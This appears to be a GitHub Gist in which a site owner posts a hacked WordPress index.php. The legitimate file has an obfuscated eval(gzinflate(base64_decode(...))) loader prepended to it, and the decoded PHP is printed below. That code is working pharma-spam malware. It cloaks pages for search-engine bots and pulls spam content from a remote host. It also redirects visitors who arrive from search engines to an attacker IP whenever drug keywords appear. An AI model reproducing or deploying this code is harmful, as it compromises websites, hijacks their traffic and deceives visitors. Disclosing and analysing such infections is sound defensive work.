Created
August 28, 2014 03:32
-
-
Save g11tch/09e6f4617bbff47ba929 to your computer and use it in GitHub Desktop.
own3d wordpress index.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php eval(gzinflate(base64_decode('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')));?>^M | |
| <?php | |
| /** | |
| * Front to the WordPress application. This file doesn't do anything, but loads | |
| * wp-blog-header.php which does and tells WordPress to load the theme. | |
| * | |
| * @package WordPress | |
| */ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ php crap.php | |
| <?php | |
| if (!defined('frmDs')){ | |
| define('frmDs' ,1); | |
| error_reporting(0); | |
| function frm_dl ($url) { | |
| if (function_exists('curl_init')) { | |
| $ch = curl_init($url); | |
| curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
| $out = curl_exec ($ch); | |
| if (curl_errno($ch) !== 0) $out = false; | |
| curl_close ($ch); | |
| } else {$out = @file_get_contents($url);} | |
| return trim($out); | |
| } | |
| function frm_crpt($in){ | |
| $il=strlen($in);$o=''; | |
| for ($i = 0; $i < $il; $i++) $o.=$in[$i] ^ '*'; | |
| return $o; | |
| } | |
| function frm_getcache($tmpdir,$link,$cmtime,$toe=false){ | |
| $f = $tmpdir.'/sess_'.md5(preg_replace('/^http:\/\/[^\/]+/', '', $link)); | |
| $fe = file_exists($f); | |
| if(!$fe || time() - filemtime($f) > 60 * $cmtime) | |
| { | |
| $dlc=frm_dl($link); | |
| if($fe && $dlc===false) | |
| @touch($f); | |
| else | |
| { | |
| if($fe && empty($dlc) && $toe) | |
| { | |
| @touch($f); | |
| } | |
| else | |
| { | |
| if($fp = @fopen($f,'w')){fwrite($fp, frm_crpt($dlc)); fclose($fp);} | |
| else{return $dlc;} | |
| } | |
| } | |
| } | |
| $fc = @file_get_contents($f); | |
| return ($fc)?frm_crpt($fc):''; | |
| } | |
| function frm_isbot(){ | |
| $ua=@strtolower($_SERVER['HTTP_USER_AGENT']); | |
| if(($lip=ip2long($_SERVER['REMOTE_ADDR']))<0)$lip+=4294967296; | |
| $rs = array(array(3639549953,3639558142),array(1089052673,1089060862),array(1123635201,1123639294),array(1208926209,1208942590), | |
| array(3512041473,3512074238),array(1113980929,1113985022),array(1249705985,1249771518),array(1074921473,1074925566), | |
| array(3481178113,3481182206),array(2915172353,2915237886),array(2850291712,2850357247)); | |
| foreach ($rs as $r) if($lip>=$r[0] && $lip<=$r[1]) return true; | |
| if(!$ua)return true; | |
| $bots = array('googlebot','bingbot','slurp','msnbot','jeeves','teoma','crawler','spider'); | |
| foreach ($bots as $b) if(strpos($ua, $b)!==false) return true; | |
| $h=@gethostbyaddr($_SERVER['REMOTE_ADDR']); | |
| $hba=array('google','msn','yahoo'); | |
| if($h) foreach ($hba as $hb) if(strpos($h, $hb)!==false) return true; | |
| return false; | |
| } | |
| function frm_tmpdir(){ | |
| $fs = array('/tmp','/var/tmp','./wp-content/cache','./wp-content/uploads','./tmp','./cache','./images'); | |
| foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) { | |
| if ($t = getenv($v)) {$fs[]=$t;} | |
| } | |
| if (function_exists('sys_get_temp_dir')) {$fs[]=sys_get_temp_dir();} | |
| $fs[]='.'; | |
| foreach ($fs as $f){ | |
| $tf = $f.'/'.md5(rand()); | |
| if($fp = @fopen($tf, 'w')){ | |
| fclose($fp); | |
| unlink($tf); | |
| return $f; | |
| } | |
| } | |
| return false; | |
| } | |
| function frm_seref(){ | |
| $r = @strtolower($_SERVER["HTTP_REFERER"]); | |
| $ses = array('google','bing','yahoo','ask','aol'); | |
| foreach ($ses as $se) if(strpos($r, $se.'.')!=false) return true; | |
| return false; | |
| } | |
| function frm_havekey($s=false){ | |
| $nks = explode('|','abilify|albenza|aldactone|amoxil|antabuse|apcalis|atarax|baclofen|bactrim|bimatoprost|buspar|celebrex|celexa|cialis|cipro|clomid|desyrel|diflucan|doxycycline|elavil|erectalis|eriacta|erythromycin|finpecia|flagyl|glucophage|inderal|kamagra|lasix|levaquin|levitra|lexapro|megalis|mobic|motilium|nexium|nolvadex|orlistat|paxil|penisole|periactin|premarin|priligy|propecia|proscar|proventil|retin-a|robaxin|seroquel|silagra|sildalis|silvitra|strattera|stromectol|p-force|synthroid|tadacip|tadalis|tadapox|tenormin|tetracycline|topamax|valtrex|ventolin|viagra|vigora|wellbutrin|zanaflex|zenegra|zithromax|sildenafil|tadalafil|vardenafil|zovirax'); | |
| $k = ($s==false)?@strtolower($_SERVER["HTTP_REFERER"].$_SERVER["REQUEST_URI"]):$s; | |
| if (strpos($k,"site%3A")!==false||strpos($k,"inurl%3A")!==false) return ''; | |
| foreach ($nks as $n)if(preg_match("/(\b|_)$n(\b|_)/" , $k)) return $n; | |
| return ''; | |
| } | |
| function frm_strtonum($Str, $Check, $Magic) { | |
| $Int32Unit = 4294967296; | |
| $length = strlen($Str); | |
| for ($i = 0; $i < $length; $i++) { | |
| $Check *= $Magic; | |
| if ($Check >= $Int32Unit) { | |
| $Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit)); | |
| $Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check; | |
| } | |
| $Check += ord($Str{$i}); | |
| } | |
| return $Check; | |
| } | |
| function frm_chhash($String) { | |
| $Check1 =frm_strtonum($String, 0x1505, 0x21); | |
| $Check2 = frm_strtonum($String, 0, 0x1003F); | |
| $Check1 >>= 2; | |
| $Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F); | |
| $Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF); | |
| $Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF); | |
| $T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F ); | |
| $T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 ); | |
| $Hashnum = ($T1 | $T2); | |
| $CheckByte = 0; | |
| $Flag = 0; | |
| $HashStr = sprintf('%u', $Hashnum) ; | |
| $length = strlen($HashStr); | |
| for ($i = $length - 1; $i >= 0; $i --) { | |
| $Re = $HashStr{$i}; | |
| if (1 === ($Flag % 2)) { | |
| $Re += $Re; | |
| $Re = (int)($Re / 10) + ($Re % 10); | |
| } | |
| $CheckByte += $Re; | |
| $Flag ++; | |
| } | |
| $CheckByte %= 10; | |
| if (0 !== $CheckByte) { | |
| $CheckByte = 10 - $CheckByte; | |
| if (1 === ($Flag % 2) ) { | |
| if (1 === ($CheckByte % 2)) { | |
| $CheckByte += 9; | |
| } | |
| $CheckByte >>= 1; | |
| } | |
| } | |
| return '7'.$CheckByte.$HashStr; | |
| } | |
| function frm_chpr($url,$td){ | |
| $ch=frm_chhash($url); | |
| $res=frm_getcache($td,"http://toolbarqueries.google.com/tbr?client=navclient-auto&features=Rank&ch=$ch&q=info:$url",60*24*7); | |
| if(($pos = strpos($res, "Rank_"))!==false) return substr($res,9,1); | |
| } | |
| function frm_red($k){ | |
| if(!frm_isbot() && frm_seref()){ | |
| $r=@urlencode($_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']); | |
| $s=@urlencode($_SERVER['HTTP_REFERER']); | |
| die("<!DOCTYPE html><html><body><script>document.location=(\"http://178.73.212.30/stat/go.php?k=$k&s=$s&r=$r\");</script></body></html>"); | |
| } | |
| } | |
| $tdir = frm_tmpdir(); | |
| $isb=frm_isbot(); | |
| $k=frm_havekey(); | |
| $host = preg_replace('/^w{3}\./','', strtolower($_SERVER['HTTP_HOST'])); | |
| if($cv=@$_POST[md5($host.'ch')]){exit($cv);} | |
| if($tdir && strlen($host)<100 && !preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/', $host)){ | |
| $parg = substr(preg_replace( '/[^a-z]+/', '',strtolower(base64_encode(md5($host.'p1')))),0,3); | |
| $sp = "http://uwvbfiyuw.byinter.net/stat/feed.php?pa=$parg&h=$host"; | |
| // | |
| $tp=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; | |
| if($isb && ($ppr = frm_chpr($tp)) > 1){ | |
| $pc=frm_getcache($tdir, $sp."&a=l&p=".urlencode($tp)."&pr=$ppr",60*24); | |
| if($pc) die($pc); | |
| } | |
| // | |
| $ruri = strtolower($_SERVER['REQUEST_URI']); | |
| $pageid = (isset($_GET[$parg]))?$_GET[$parg]*1:0; | |
| if((strpos($ruri,'/?')===0||strpos($ruri,'/index.php?')===0) && $pageid > 0){ | |
| frm_red($k); | |
| die(frm_getcache($tdir, $sp."&p=$pageid",60*24,true)); | |
| } | |
| if (($ruri=='/' || $ruri=='/index.php') && $isb) { | |
| $c=frm_getcache($tdir, $sp ,60*24); | |
| if($c)die($c); | |
| } | |
| // | |
| if($k && $sdl = frm_getcache($tdir, $sp."&a=s", ($isb ? 30 : 60*24*7) ,true)){ | |
| if(strpos($sdl, '|'.$ruri.'|') !== false){ | |
| frm_red($k); | |
| die(frm_getcache($tdir, $sp."&a=s&p=".urlencode($ruri),60*24*7,true)); | |
| } | |
| } | |
| } | |
| if($k) frm_red($k); | |
| } | |
| ?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment